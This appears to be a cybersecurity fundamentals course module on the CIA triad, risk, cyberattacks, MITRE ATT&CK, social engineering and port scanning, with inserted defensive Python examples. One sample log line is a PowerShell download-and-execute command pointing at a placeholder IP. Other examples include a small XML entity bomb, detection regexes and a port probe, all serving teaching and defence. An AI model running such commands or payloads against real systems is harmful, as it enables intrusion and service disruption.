Cybersecurity Fundamentals

Uploaded by Termux Monet

What's New in Cybersecurity Fundamentals

What's new - introduction


5 minutes

Introduction

What's new?

• Important updates to content in previous course modules

Cybersecurity evolves alongside developments in politics and technology, such as artificial intelligence (AI). This
course must also evolve to keep up with the field!

This module covers important updates to content in previous course modules. The lessons present these updates
in a consistent format. For example, consider the next lesson, What’s New for “Overview of Cybersecurity”.

• The lesson includes new content relevant to various lessons in the Overview of Cybersecurity module.

• For each updated lesson from the Overview of Cybersecurity module, you’ll find two components:
• A list summarizing what’s new

• The new content

At the end of each What’s New module, you’ll be presented with a short quiz to test your learning of the new
concepts. You must pass this quiz to mark the lesson complete. But don’t worry! If you aren’t successful at first,
you can retake the quiz as many times as needed to pass.

What's new - overview of cybersecurity


15 minutes

What is cybersecurity?

What's new?

• Added more explanation for the CIA triad

• Added discussion of security controls used to meet each of the CIA triad’s objectives

CIA triad
Now you know what cybersecurity is. But what is it trying to accomplish? Effective cybersecurity delivers on three
objectives:

• Confidentiality

• Integrity

• Availability

These objectives make up the CIA triad (Confidentiality, Integrity, and Availability), a well-known model and a
cornerstone of cybersecurity.

Let’s explore each objective of the CIA triad.


Confidentiality

Confidentiality means keeping data secret; that is, only authorized people can access or disclose the
data. For example, software companies typically keep their applications’ source code secret for
competitive advantage. To reduce the chances of a source code leak, they restrict access to only the
employees who need it. Confidentiality also covers people’s private data. One example is that your
healthcare provider must ensure that data collected while treating you, such as diagnoses or
prescriptions, stays private. With few exceptions, only you, your doctor, and authorized medical staff
should have access to that data.

In practice, confidentiality involves implementing safeguards that give the right level of access to the
right set of users at the right times, using the right methods.

Integrity

Integrity means ensuring that data is trustworthy and accurate by protecting it from unauthorized
modification and destruction. Say you spend $10 on a pizza. You might not care whether that
purchase is confidential. But what if something alters the transaction amount and you end up
spending $10,000 instead? Note that the integrity of this transaction might have been compromised
intentionally or unintentionally. Also, consider that although the cause of the error might be
technical, it might be human, too. Maybe someone entered the wrong payment amount.

To preserve integrity, you must also prevent unauthorized people from editing the data. In this
sense, integrity and confidentiality overlap.

Availability

Availability means ensuring timely and reliable access to and use of the data. For example, you
expect 24x7 online access to your bank account. To meet that expectation, your bank must
implement and maintain sufficient resources to keep online banking available and functioning
properly.

But timely access does not always mean immediate or even continuous access. For example, when
you request school transcripts, you might need to wait several days for school employees to locate,
process, and send out the documents. And if the school provides transcripts electronically, it might
limit the time frame in which recipients can access them. Regardless, the data is available within and
for a reasonable amount of time.

The CIA triad helps guide cybersecurity-related policies in an organization. Depending on their operations and the
scenarios that they encounter, different organizations might prioritize one objective over the others.

Controls
To meet each objective of the CIA triad, you need controls. In cybersecurity, controls are safeguards or
countermeasures to avoid, detect, counteract, or minimize security risks to physical, tangible, or digital property.

Let’s explore examples of controls for preserving confidentiality, integrity, and availability.


Controls for confidentiality



Consider these standard controls for preserving confidentiality.

• Encryption converts your data into a form that only someone with the decryption key can
understand.

• Access controls are measures designed to ensure that only the correct people can view, modify, or
share data. If you use password protection, you’re using an access control. Access controls also
include biometrics, such as fingerprints or retinal scans, that ensure that only authorized people
can access the data.

• Patch management involves updating system software. Regularly updating system software fixes
potential security weak points that attackers can exploit.

Controls for integrity



Consider these standard controls for preserving integrity.

• Checksums are values that a mathematical algorithm generates from a data set. If the data
changes, the checksum also changes, alerting you to the alteration.

• Access controls and user permissions can limit who can change data and what changes they can
make.

• Data backups can help restore data to its correct state if changes occur.

• Audit trails can track and record all changes made to data. They give you a clear record of who
made a change and when they made it.
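An added example, not part of the course, showing the checksum control above in Python on the page's pizza scenario: a SHA-256 checksum detects the $10 to $10,000 alteration, and, going one step beyond the text, a keyed checksum (HMAC) also survives a deliberate tamperer who rewrites the stored checksum to match. The transaction record and the verifier key are constructed for the demonstration.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed sample record for the page's pizza scenario; not data from the course.
ORIGINAL_TXN = {"id": "txn-0001", "merchant": "Pizza Place", "amount_usd": "10.00"}

# Hypothetical secret known only to the system that verifies records.
VERIFIER_KEY = b"constructed-demo-key-do-not-reuse"


def canonical(record: dict) -> bytes:
    """Serialize deterministically so identical data always yields identical bytes."""
    return json.dumps(record, sort_keys=True, separators=(",", ":")).encode("utf-8")


def checksum(record: dict) -> str:
    """Plain SHA-256 checksum of the record (detects accidental or careless changes)."""
    return hashlib.sha256(canonical(record)).hexdigest()


def keyed_checksum(record: dict, key: bytes) -> str:
    """HMAC-SHA-256: whoever alters the record cannot recompute this without the key."""
    return hmac.new(key, canonical(record), hashlib.sha256).hexdigest()


def verify(record: dict, expected: str, key: Optional[bytes] = None) -> bool:
    """True if the record still matches the stored (plain or keyed) checksum."""
    actual = keyed_checksum(record, key) if key is not None else checksum(record)
    return hmac.compare_digest(actual, expected)  # constant-time comparison


def demo() -> dict:
    """Run the page's $10 -> $10,000 scenario against both kinds of checksum."""
    stored_plain = checksum(ORIGINAL_TXN)
    stored_keyed = keyed_checksum(ORIGINAL_TXN, VERIFIER_KEY)

    # The transaction amount is altered, intentionally or by mistake.
    altered = dict(ORIGINAL_TXN, amount_usd="10000.00")

    # A deliberate tamperer who can also rewrite the stored plain checksum.
    forged_plain = checksum(altered)

    return {
        "unchanged_passes_plain": verify(ORIGINAL_TXN, stored_plain),
        "altered_fails_plain": not verify(altered, stored_plain),
        # True here is the weakness: a plain checksum can be recomputed by the tamperer.
        "forged_plain_accepted": verify(altered, forged_plain),
        "unchanged_passes_keyed": verify(ORIGINAL_TXN, stored_keyed, VERIFIER_KEY),
        # The keyed checksum stored earlier no longer matches and cannot be re-forged.
        "altered_fails_keyed": not verify(altered, stored_keyed, VERIFIER_KEY),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

Every entry of `demo()` is True, including `forged_plain_accepted`, which is exactly why a plain checksum alone is an integrity control against accidents rather than against a determined insider; the key must be stored separately from the data it protects.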

Controls for availability



Consider these standard controls for preserving availability.

• Redundant systems and data backup procedures help protect against data loss or system failure.
You might use multiple servers or store data in multiple locations.

• Antimalware software and firewalls protect systems from attacks that can disrupt services.

• Disaster recovery and business continuity plans lay out the steps needed to restore services
quickly and efficiently in case a disruption occurs, minimizing downtime.

Key Elements of Cybersecurity

What's new?

• Changed the first key element of cybersecurity from People to Education

• Added a section that describes the Education element of cybersecurity

Education
Education and awareness are among the most effective ways to improve an organization’s cybersecurity. You can
hold regular training sessions to teach employees the importance of cybersecurity and their role in maintaining it.
A culture of awareness around cybersecurity reduces the chances that employees engage in risky behavior and
increases the chances of them reporting suspicious activity. In short, education and awareness build a human
firewall that often catches threats that technology misses.

Risk Management

What's new?

• Revised the explanations of the four risk responses

• Expanded the explanation of risk appetite

Risk response
After an organization assesses all its risks, it starts risk management or response. Generally, organizations can
choose from the following four responses to a risk.


Acceptance

The organization accepts the risk in its current form. It acknowledges the potential consequences of
the risk and is prepared to deal with them if they occur. A senior person within the organization,
referred to as a risk owner, makes the decision to accept a risk.

Transference

The organization chooses to transfer the risk. It can have a third party accept part or all of the risk
instead of accepting the risk itself. Transfer typically occurs through insurance or outsourcing.
Though the risk remains, another entity manages its impact, reducing the direct threat to the
organization.

Reduction

The organization decides a risk is too large to accept and aims to reduce it in some fashion. To
reduce the risk, the organization can reduce either its likelihood or consequence. It does so by
implementing security controls or patching system vulnerabilities.

Rejection

The organization decides a risk is too high and rejects it, meaning that the organization withdraws
from being affected by it. Rejecting the risk can significantly change business operations. For
example, rejection might involve shutting down sites, avoiding markets, or avoiding activities that
lead to the risk.

Risk Appetite
A risk appetite is the level of risk that an organization is willing to accept.

• An organization has a high risk appetite if it is willing to accept a high level of risk.

• An organization has a low risk appetite if it does not like accepting risk.

In cybersecurity, risk appetite refers to an organization’s willingness to accept the potential consequences of
cyberattacks. Organizations with a high risk appetite might take bold initiatives, using the latest technologies and
potentially vulnerable systems, to pursue significant competitive advantages. They accept the risk of potential
cyberattacks, but also have robust contingencies for when breaches occur.

Conversely, organizations with a low risk appetite are more cautious in their approach to cybersecurity. They
might prioritize stability and reliability over competitive advantage, focusing more on protective measures such as
firewalls, encryption, and regular system updates. These organizations aim to minimize the risk of cyberattacks as
much as possible, even if doing so means missing out on certain opportunities.

Note that neither approach is better. An organization’s level of risk appetite should align with its overall strategic
goals and resources. It should also vary by the potential impact of cyberattacks on its operations and reputation.

Law and ethics

What's new?

• Expanded the discussion of computer misuse laws to cover some other notable cybercrime laws

• Expanded the discussion of cybersecurity ethics to cover some of the most important ethical
debates in cybersecurity today

Other notable cybercrime laws


Cybercrime laws aren’t limited to computer misuse. Let’s explore other notable laws common in numerous
countries.

Unauthorized data alteration

• Laws exist to prevent unauthorized alteration, deletion, or blocking of personal data.

• Unauthorized alteration includes altering data in a way that can harm a person or an organization.

Example

An example is an attacker hacking into a financial institution’s database and changing account balances. This
act leads to unauthorized data alteration and causes significant financial harm to the organization and its
clients.

Prohibited software

• Laws are in place against creating, using, or distributing software designed for committing cybercrimes.

• Such software includes malware, such as viruses, and hacking tools.

Example
An example is an attacker sending an email with a seemingly harmless file attached, such as a PDF file. But
when the recipient opens the file, a virus within it runs, infecting the recipient’s device. Laws prohibit
distributing malware through means such as email.

Cyberstalking and harassment

• Cyberstalking and harassment laws curb harmful or threatening behavior online.

• Common examples of this behavior include stalking, bullying, or intimidating others on the internet.

Example

A typical example of cyberstalking or harassment is someone continuously sending threatening messages to
another person through social media platforms, email, or other online communication tools. Cyberstalking
and harassment laws apply if the threats escalate to a point where the recipient feels unsafe or fearful. Such
actions can result in serious legal consequences, so people must exercise respect and discretion in online
interactions.

Discussion on Ethics
As the laws vary across the world, so do ethics. Lively debate continues about many aspects of ethics within
cybersecurity. For example, should organizations be permitted to leave booby-trapped files within their
infrastructure, awaiting an attacker to trigger one? Many argue that this practice is ethically sound. But under
most legal frameworks, such an action is illegal because the trapped files are considered malware.

Let’s examine some of the most important ethical debates in cybersecurity today.


Retaliation

Ethical dilemmas exist around using techniques from the security industry to target criminals. Can an
act of retaliation be justifiable or defensible?

Rigorous debate surrounds hack back or active defense. This concept refers to the measures that a
cyberattack victim can take to find the perpetrators and potentially disrupt their operations. Though
some argue that such measures are needed to protect assets and deter future attacks, others raise
concerns about the potential for escalation.

Artificial intelligence

The ethical implications of artificial intelligence (AI) in cybersecurity have also come under the
spotlight. As AI becomes increasingly prevalent in cybersecurity tools and practices, so do questions
about accountability, transparency, and potential misuse. Should an AI system make a mistake, who
is responsible? How much trust should people put in these systems, and how can people ensure that
they are used responsibly?

Government use

Many nations have established cyberwarfare units to safeguard national security. These units protect
critical infrastructure, conduct surveillance, and launch cyberattacks. The laws and regulations
governing these units vary considerably and can be ambiguous. Whether laws of traditional warfare
should apply to the cyber realm is a contentious issue, and no worldwide consensus exists yet.

The same concerns apply to other government agencies and their operations. Though many
governments have implemented laws to safeguard their citizens’ data privacy, debate continues
about the extent to which government surveillance is ethical. Governments must balance national
security concerns and individual privacy rights.


What's new - cybersecurity: on the offense


20 minutes

Types of Cyberattacks

What's new?

• Updated the descriptions and examples for the following types of cyberattacks:

• Denial-of-service (DoS) attack

• Distributed denial-of-service (DDoS) attack

• Domain Name System (DNS) attack

• Added a new section on the use of AI in cyberattacks

Denial-of-service (DoS) attack

• A denial-of-service (DoS) attack is any attack that causes a complete or partial system outage.

• DoS can occur when a person or system floods a website or online service with too much network traffic, much
like a traffic jam on a road. This traffic overflow makes the website or service slow down or shut down
completely, denying access to legitimate users.

• DoS can also occur when traffic consumes enough system resources to slow down or crash the system.

Example

An attacker uses a billion laughs attack, also known as an XML bomb, where the attacker creates a small,
seemingly harmless piece of code in an Extensible Markup Language (XML) document. The attacker then
submits this document to the target organization’s system. When the system processes the code, the code
continually replicates. The replications consume more and more system resources, eventually slowing down
or even crashing the system.
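A defender's view of the XML bomb described above, added here and not part of the course: the expansion comes from entity declarations in the document's DTD that refer to one another, so a hardened parser simply refuses any document that declares entities (the same rule that libraries such as defusedxml enforce), while the unsafe mode shows how one short reference expands into many characters. Both documents are constructed; the miniature nests only three levels and stays tiny, unlike a real bomb.

```python
import xml.parsers.expat

# Constructed miniature of the nested-entity pattern (three levels; a single
# reference to lol2 expands to 48 characters). A real XML bomb nests far deeper.
MINI_BOMB = b"""<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>"""

# Constructed benign document for comparison.
BENIGN = b"""<?xml version="1.0"?><order><item qty="2">pizza</item></order>"""


class UnsafeXMLError(ValueError):
    """Raised when a document declares entities and the caller did not allow them."""


def inspect_xml(xml_bytes: bytes, allow_entities: bool = False) -> dict:
    """Parse with expat and report how much work the parser did.

    Returns {"input_bytes", "elements", "text_chars"}. With allow_entities=False
    (the safe default) the first entity declaration in the internal DTD subset
    aborts parsing, before any reference can be expanded.
    """
    parser = xml.parsers.expat.ParserCreate()
    stats = {"input_bytes": len(xml_bytes), "elements": 0, "text_chars": 0}

    def on_start(name, attrs):
        stats["elements"] += 1

    def on_text(data):
        # Expanded entity text arrives here, possibly in several chunks.
        stats["text_chars"] += len(data)

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Raising inside a handler stops expat and propagates the exception.
        raise UnsafeXMLError(f"entity declaration {name!r} rejected")

    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    if not allow_entities:
        parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)
    return stats


def rejects_entities(xml_bytes: bytes) -> bool:
    """True if the safe parser refuses the document."""
    try:
        inspect_xml(xml_bytes)
    except UnsafeXMLError:
        return True
    return False


if __name__ == "__main__":
    print("benign, safe mode:", inspect_xml(BENIGN))
    print("bomb rejected in safe mode:", rejects_entities(MINI_BOMB))
    print("bomb, unsafe mode:", inspect_xml(MINI_BOMB, allow_entities=True))
```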

Distributed denial-of-service (DDoS) attack

• A distributed denial-of-service (DDoS) attack is an attack that comes from multiple sources simultaneously to
cause a complete or partial system outage.

• To perform DDoS attacks, attackers use bots. A bot, or zombie, is an internet-connected device infected with
malware that enables the attacker to control the device remotely. For DDoS attacks, attackers manipulate
multiple bots under the same instance, forming a network of bots called a botnet. A botnet can include
hundreds or even thousands of bots, each sending data or requesting access from the target server
simultaneously. This sudden traffic surge overwhelms the server, causing a denial of service to its users.

• Attackers can use AI to analyze patterns and predict the optimal number of bots needed to effectively
overwhelm a target’s server without wasting resources. AI also helps attackers monitor each bot’s
performance in real time to maximize effectiveness.

Example

An attacker can send many page requests to a web server over a brief period, overloading the server.
Similarly, spikes in user demand on ticket sale websites can overload systems.

Domain Name System (DNS) attack

• The Domain Name System (DNS) is one of the core protocols used on the internet. With the DNS protocol, a
computer can resolve a domain to an IP address. For example, imagine a user types bmw.com into a browser’s
search bar and then presses Enter. The DNS protocol resolves this domain name to the IP address for the main
BMW website, taking the user to the site. This function is convenient because domain names are far easier to
remember than IP addresses!

• A DNS attack targets the DNS by manipulating or disrupting the resolution of domain names and possibly
redirecting users or hindering access to websites. It involves tactics such as domain hijacking and cache
poisoning.

Example

Attackers associated with the Roaming Mantis criminal gang have compromised wireless routers so that
entering the URL for a valid website redirects the user to a malicious website. This site delivers malware
called Wroba to the user’s device. When the device is infected, the attackers can use it as a bot, and then use
it to compromise other wireless routers. (1)

Source: (1) Lakshmanan, Ravie. Roaming Mantis Spreading Mobile Malware That Hijacks Wi-Fi Routers’ DNS
Settings (https://thehackernews.com/2023/01/roaming-mantis-spreading-mobile-malware.html). The
Hacker News, January 20, 2023.

AI in cyberattacks

Attackers are increasingly turning to AI. With AI, attackers can enhance the structure and sophistication of their
attacks in several ways.


Task automation

AI can automate repetitive tasks, enabling attackers to launch attacks at a speed and scale
otherwise impossible. For example, AI can automate the creation and dissemination of phishing
emails, increasing the likelihood of success.
Detection evasion

AI can help attackers create malware that changes and adapts to evade detection by traditional
antivirus solutions. To do so, attackers often use machine learning (ML) algorithms that can learn
from each detection attempt and alter the malware’s code to avoid future detections.

Target identification

AI can help attackers identify optimal targets for attacks. Sophisticated algorithms can analyze vast
amounts of data to identify vulnerable systems or high-value targets, thus increasing the
effectiveness of attacks.

Social engineering

Attackers can use AI technologies, such as deep learning, to enhance the effectiveness of social
engineering attacks with convincing fake audio and video content. One notable example is
deepfakes, which are fake images, videos, or audio created through deep learning. For example, an
attacker might call a victim and use an audio deepfake to impersonate someone that the victim
knows and trusts.

AI has introduced a new challenge for cyberdefense systems. The cybersecurity landscape must continually
evolve, incorporating AI in its strategies to effectively counter these advanced threats.

Structure of a cyberattack

What's new?

• Added a scenario to the “Importance of understanding cyberattacks” section to illustrate how
cyberattack frameworks help cybersecurity professionals

Importance of understanding cyberattacks


Attackers can be persistent. Rarely do they give up after a single interruption to their attack. Think of a
cyberattack as part of a longer campaign. Many attacks last months, with attackers spreading their influence and
defenders trying to identify and stop them. Good defenders try to anticipate an attacker’s next move. Frameworks
such as the MITRE ATT&CK matrix help them to do so.

To help you explore the significance of these frameworks, consider this scenario. Janina, a cybersecurity
professional, works for a major tech company. A data breach occurs. The intruder has gained access but hasn’t
fully achieved their objectives yet. Janina must determine the attacker’s strategy and prevent further damage to
the system.

Initial access

The first two tactics in the MITRE ATT&CK matrix are reconnaissance and resource development. Because
the breach has already occurred, Janina starts her investigation with the next tactic: initial access
(https://attack.mitre.org/tactics/TA0001/). She identifies the initial breach point.

Phishing

Janina investigates the initial access further to discover the technique used. She determines that the attacker
used the phishing (https://attack.mitre.org/techniques/T1566/) technique, which is listed as one of the
techniques under initial access. Specifically, the attacker used spear phishing. They tailored their phishing
email to a company executive, tricking this person into providing their login credentials.

Execution

Next, Janina turns to the MITRE ATT&CK matrix to predict the likely next steps of the attacker. She examines
the tactic that follows initial access in the matrix: execution (https://attack.mitre.org/tactics/TA0002/). She
reads that at this stage, attackers use various types of commands and scripts to run malicious code on
systems. As a cybersecurity professional, she knows that scripting is a common technique after spear
phishing. Putting all this information together, Janina predicts that the attacker used scripts to automate their
malicious operations and move further into the system.

Scripting

Janina immediately checks for signs of scripting in the system logs. She finds evidence that the attacker used
a PowerShell script to perform malicious commands. This finding confirms her hypothesis that the attacker
used scripts to move further into the system.

Persistence and privilege escalation


Having identified the attacker’s current tactics and techniques, Janina uses the MITRE ATT&CK matrix to
prepare for the next likely steps. She focuses on the persistence (https://attack.mitre.org/tactics/TA0003/)
and privilege escalation (https://attack.mitre.org/tactics/TA0004/) tactics, which typically follow
execution. She counters the cyberattack with the mitigation strategies listed under both tactics.

By anticipating the attacker’s moves and using the matrix as a guide, Janina effectively countered the breach,
limited damage, and protected the company’s systems.
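The check Janina performs at the Scripting step, as an added example that is not part of the course: a small triage routine scores PowerShell script-block log records against widely published indicators and maps each hit to an ATT&CK technique so the finding lands in the matrix she is working from. The events are constructed in the shape of Windows PowerShell script-block logging (Event ID 4104), the user names are invented, and the rule weights and threshold are assumptions a real team would tune.

```python
import re

# Constructed records shaped like PowerShell script-block logging (Event ID 4104).
# The phished executive's account is the one that runs the suspicious scripts.
SAMPLE_EVENTS = [
    {"event_id": 4104, "user": "CORP\\svc_backup",
     "script": "Get-ChildItem C:\\Backups | Where-Object { $_.LastWriteTime -lt (Get-Date).AddDays(-30) }"},
    {"event_id": 4104, "user": "CORP\\exec.jdoe",
     "script": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand <base64-placeholder>"},
    {"event_id": 4104, "user": "CORP\\exec.jdoe",
     "script": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/u.ps1')"},
    {"event_id": 4104, "user": "CORP\\helpdesk",
     "script": "Restart-Service Spooler"},
]

# (rule name, pattern, ATT&CK technique the hit maps to, weight). Weights are assumptions.
RULES = [
    ("encoded_command", re.compile(r"-enc(?:odedcommand)?\b", re.I), "T1059.001", 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "T1564.003", 1),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
     "T1105", 3),
    ("invoke_expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I), "T1059.001", 2),
    ("base64_decode", re.compile(r"FromBase64String", re.I), "T1027", 2),
]

# Assumed alerting threshold: one strong indicator or two weaker ones together.
THRESHOLD = 3


def score_event(event: dict) -> dict:
    """Score one script-block record and list the rules and techniques it matched."""
    matched = [(name, ref, weight) for name, pattern, ref, weight in RULES
               if pattern.search(event["script"])]
    return {
        "user": event["user"],
        "score": sum(weight for _, _, weight in matched),
        "rules": [name for name, _, _ in matched],
        "techniques": sorted({ref for _, ref, _ in matched}),
    }


def triage(events: list, threshold: int = THRESHOLD) -> list:
    """Return only script-block events at or above the threshold, highest score first."""
    scored = [score_event(e) for e in events if e.get("event_id") == 4104]
    return sorted((s for s in scored if s["score"] >= threshold), key=lambda s: -s["score"])


def users_to_review(events: list) -> list:
    """Accounts that ran flagged scripts; the pivot for the persistence/escalation check."""
    return sorted({finding["user"] for finding in triage(events)})


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
    print("review accounts:", users_to_review(SAMPLE_EVENTS))
```

Two of the four records are flagged, both under the executive's account, which is the hypothesis the scenario's log check confirms; the benign backup and help-desk scripts score zero.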

Funding and profitability of cybercrime

What's new?

• Revised and expanded the explanation of the underground ecosystem

• Expanded the description of cryptocurrency

Underground ecosystem
A vital element of the cybercrime economy is a robust and growing underground ecosystem with a vast,
interconnected network of illegal platforms and forums. In this digital black market, cybercriminals buy, sell, and
trade tools and stolen data. They also use this space to collaborate and train themselves and others. They can
seek advice, learn new attack methods, and even hire skilled people to perform specific tasks. Like a traditional
economy, specialism drives efficiency and allows criminals to focus on what they each do best.

The underground ecosystem continually evolves, with new forums and platforms appearing as authorities shut
down others. Its dynamic nature and global reach make it a challenging threat to cybersecurity efforts.

Cryptocurrency
You learned that in ransomware attacks, cybercriminals require victims to pay a ransom. Typically, victims must
pay in the cybercriminal’s preferred currency: cryptocurrency. But what exactly is cryptocurrency, and why do
cybercriminals prefer it?

Cryptocurrency is a digital or virtual currency that uses cryptography to secure financial transactions, control the
creation of new currency units or coins, and verify asset transfers. Each cryptocurrency has its own rules and
protocols, but they all operate on an emerging technology called blockchain. Blockchain is a distributed ledger
that records all transactions across a computer network. The system encrypts each transaction, adds it to a
block, and then adds that block to a chain of previous blocks. This process creates a permanent and transparent
record of all transactions, making altering or manipulating the data difficult.

One of the most well-known cryptocurrencies is Bitcoin. Introduced in 2009, Bitcoin paved the way for
developing numerous other cryptocurrencies, often called altcoins.

Cryptocurrency in cybercrime

Cryptocurrencies offer several advantages over traditional currencies, such as faster and cheaper transactions,
increased privacy and security, and potential service for unbanked or underbanked individuals. But
cryptocurrencies also pose risks, such as volatility in their value and challenges from regulations. The most
relevant risk for cybersecurity is their potential use in illicit activities.

Cybercriminals often use cryptocurrencies because the currency is anonymous and typically decentralized,
meaning that it operates independently of a central authority, such as a government or bank. These features
make tracing transactions difficult for law enforcement agencies. Cryptocurrencies, especially Bitcoin, have
become the primary currency of the dark web, where criminals trade illicit goods and services. Consider the
following examples:

• In ransomware attacks, cybercriminals demand payment in Bitcoin because its anonymous nature masks the
receiver’s identity.

• In many money laundering schemes, cybercriminals use Bitcoin to erase the funds’ illicit origins by moving
money through virtually untraceable networks.

Social engineering

What's new?

• Revised and expanded the “Why does social engineering work?” section

• Expanded the “How can you defend against social engineering?” section to include a discussion of
how organizations defend against social engineering

Why does social engineering work?


Social engineering works because humans are imperfect. In short, attackers exploit people’s propensity to take
shortcuts and make quick decisions based on false promises.

Let’s explore the specific reasons why social engineering works so well.


Human nature and social norms



Social engineering takes advantage of human psychology and our natural inclination to trust and
help others. Attackers exploit social norms and expectations to manipulate people into divulging
information or performing actions that they wouldn’t perform otherwise.

For example, an attacker might pose as a coworker in distress, urgently needing access to a
particular system to meet a deadline. The target, driven by the desire to be helpful, provides the
requested information without second-guessing the authenticity of the request.

Trust and authority



Attackers often exploit people’s trust in authority figures or institutions. They can gain credibility and
deceive targets by impersonating someone in a position of power or using official-sounding
language.

For example, an employee might receive an email from someone claiming to be the company’s chief
executive officer (CEO). The supposed CEO demands immediate action on a sensitive issue, such as
providing access to a client’s records. Because the email seemingly comes from the top executive,
the employee hastily complies without verifying the authenticity of the request. As a result, the
employee provides confidential client data to the attacker.

Emotional manipulation

Social engineering often uses emotions such as fear, curiosity, or excitement to influence decision-
making. Attackers create a sense of urgency or exploit personal vulnerabilities to manipulate targets.

For example, someone might receive a phone call from an attacker posing as a representative for the
lottery. The attacker congratulates the person for winning the grand prize. The excitement and lure
of a large monetary reward cloud the victim’s judgment. In turn, they share their bank account
information to ensure the lottery company can transfer the supposed prize into their account.

Lack of awareness

Social engineering works well on people less informed about common security and potential risks.
And people unfamiliar with social engineering tactics are especially susceptible to manipulation.

For example, a person might receive an email that seems to be from a trusted banking institution
instructing them to update their password because of a security breach. Unaware of standard social
engineering tactics such as this one, the person promptly follows the instructions and unknowingly
gives their login details to the attacker.

All these factors impact a target’s ability to make a good decision or even notice that they are being manipulated
in the first place.

How can you defend against social engineering?

But how do organizations defend against social engineering? They should focus on the three key elements of
cybersecurity: process, education, and technology.

• Process: They should implement policies that outline the acceptable use of corporate resources and
procedures for handling sensitive information.

• Education: They should hold regular cybersecurity training sessions to ensure that every employee
understands the policies and the risks associated with violating them.

• Technology: They should invest in security software, such as spam filters and antimalware software, that can
detect and thwart social engineering attacks.

When implemented together, these measures can significantly boost an organization’s defenses against social
engineering.

Open-source intelligence

What's new?


• Added three more sources of open information to the “Sources of open information” section

Sources of open information


Imagine that an attacker wants to collect basic information about an organization or person. Where might they
start? Below are a few examples of common sources of open information. Remember that many more possible
sources exist, and new ones emerge all the time.


Forums and discussion boards



Online platforms like Reddit, Quora, and technology-specific message boards might contain a
plethora of helpful information. People often share expertise, experiences, and insights on these
platforms, inadvertently disclosing valuable information about an organization’s people,
technologies, or security.

Job posts

Job posts can contain various details helpful in planning an attack. For example, a post might list
software that applicants must be proficient with, indicating that employees use this software. An
attacker can research it for known vulnerabilities to help plan an effective attack.

Other helpful information about the company can include proprietary technologies, upcoming
projects, and organizational structure.

DNS records

An attacker can use various online tools to examine an organization’s DNS records. For example,
WHOIS is a protocol that you can use to query databases that store registered users or assignees of
an internet resource, such as a domain name. It provides information about the organization or
person who registered a domain, including their contact details. Attackers might also discover
subdomains that can reveal the organization’s network infrastructure.

Technical Scanning

What's new?

• Revised and expanded the “Port scanning” section

• Added descriptions of version and operating system (OS) scanning to the “Network vulnerability
scanning” section

• Added two new sections:

• Network scanning

• AI in technical scanning

Port scanning

How does it work?

In networking, applications are accessible externally through services on digital ports. A port is a connection
point that sends or receives data for a specific network service, such as email. Each port is assigned a number in
the Transmission Control Protocol (TCP), a collection of internet protocols that make it possible to create and
maintain communication between internet-connected devices. Each port is also associated with an IP address.
The relationship between IP addresses and ports is like that between a building and its floors: an IP address is
like a building, and port numbers are like different floors in that building.

The usual goal of port scanning is to identify a host’s open ports.

• A host is a device, such as a server, workstation, laptop, or other smart device, that can communicate with
other devices on a network and grant access to devices outside the network.

• An open port is one that accepts a connection. Given that a port number is like a floor in a building, an open
port is like a floor that you can access through an open door.
Attackers want to find and exploit open ports on hosts. Conversely, network administrators want to close or block
these ports while ensuring that legitimate users still have access.

This diagram depicts a port scanner scanning a server. The scanner tests one port at a time to determine if a
specific service is available on the port. However, each port rejects the connection, meaning it’s a closed port.

The scanner reports that a port is closed if the port rejects the connection or filtered if the host gives no response
to the scan. No response can mean that a packet filter, a type of firewall, is blocking access to the port.

What does it provide?

By working through the list of a host’s well-known ports, a scanner can often determine what the host’s owner
uses the device for. The TCP contains 65,536 ports. TCP ports 0 through 1,023 are called well-known ports: each
has a specific service associated with it, and this association is internationally recognized. Some ports from 1,024
through 49,151 might also have officially registered uses of interest.
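The open, closed, and filtered states described above, as an added example that is not code from the course or from Nmap: a Python connect() probe that classifies each port, with a throwaway listener on 127.0.0.1 so it runs offline against a host you administer. The names for ports 80, 445, and 3389 are the ones the text gives; other names come from the OS services database.

```python
"""Port-state classification with a plain TCP connect() probe.

Added illustration for the port scanning section (not the course's own code, nor Nmap's).
It reports the three states the text describes: open when the handshake completes, closed
when the host refuses, filtered when nothing answers. The fixture at the bottom starts a
throwaway listener on 127.0.0.1 so the demo works without any network access.
"""
import socket
import threading
from contextlib import closing

OPEN, CLOSED, FILTERED = "open", "closed", "filtered"

# Well-known ports named in the text; anything else is looked up in the OS services database.
WELL_KNOWN = {80: "http", 445: "microsoft-ds (Windows file sharing)", 3389: "ms-wbt-server (RDP)"}


def probe_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Attempt one TCP handshake and classify the result the way a scanner does."""
    with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
        except ConnectionRefusedError:
            return CLOSED      # host answered with RST: no service is listening there
        except OSError:
            return FILTERED    # timeout or ICMP unreachable: a packet filter likely dropped the probe
        return OPEN            # handshake completed: some service accepted the connection


def scan_ports(host: str, ports, timeout: float = 1.0) -> dict:
    """Probe the given ports one at a time, as in the diagram, and map each to its state."""
    return {port: probe_port(host, port, timeout) for port in ports}


def service_name(port: int) -> str:
    """Name the service conventionally associated with a port, or 'unknown'."""
    if port in WELL_KNOWN:
        return WELL_KNOWN[port]
    try:
        return socket.getservbyport(port, "tcp")   # reads /etc/services; absent on minimal systems
    except OSError:
        return "unknown"


def start_local_listener():
    """Constructed fixture: bind a throwaway service on 127.0.0.1 so one port is genuinely open.

    Returns the listening socket (close it to make the port 'closed' again) and its port number.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
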